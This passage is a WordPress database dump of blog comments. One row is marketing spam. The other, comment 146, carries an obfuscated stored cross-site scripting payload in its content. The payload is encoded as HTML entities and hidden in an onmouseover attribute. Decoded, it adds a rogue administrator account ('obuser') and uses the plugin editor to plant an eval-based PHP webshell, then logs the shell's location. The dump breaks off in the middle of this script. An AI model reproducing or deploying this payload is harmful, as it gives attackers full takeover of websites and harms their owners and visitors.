(145, 1, 'Lindsey', 'irqyhwem@tom.com', 'http://digitalvikn.com.br/u/nk00', '23.95.196.194', '2015-10-19 01:25:42', '2015-10-19 01:25:42', 'I was just looking at your Hello world! | Cross Training Center (Namur) site and see that your site has the potential to become very popular. I just want to tell you, In case you didn\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for websites like yours. By getting your site on this network you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can find out more about it here: http://ittsy.com/it/3x - Now, let me ask you... Do you need your website to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your site on the network I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the network before paying anything. All the popular websites are using this service to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://ittsy.com/it/3x', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);
INSERT INTO `www2_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(146, 1, 'zhong', 'vemgujqg@gmail.com', 'http://www.facebook.com/wddllhaqnte', '36.235.41.64', '2015-11-09 11:55:44', '2015-11-09 11:55:44', 'Hi nice ar PbAn<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#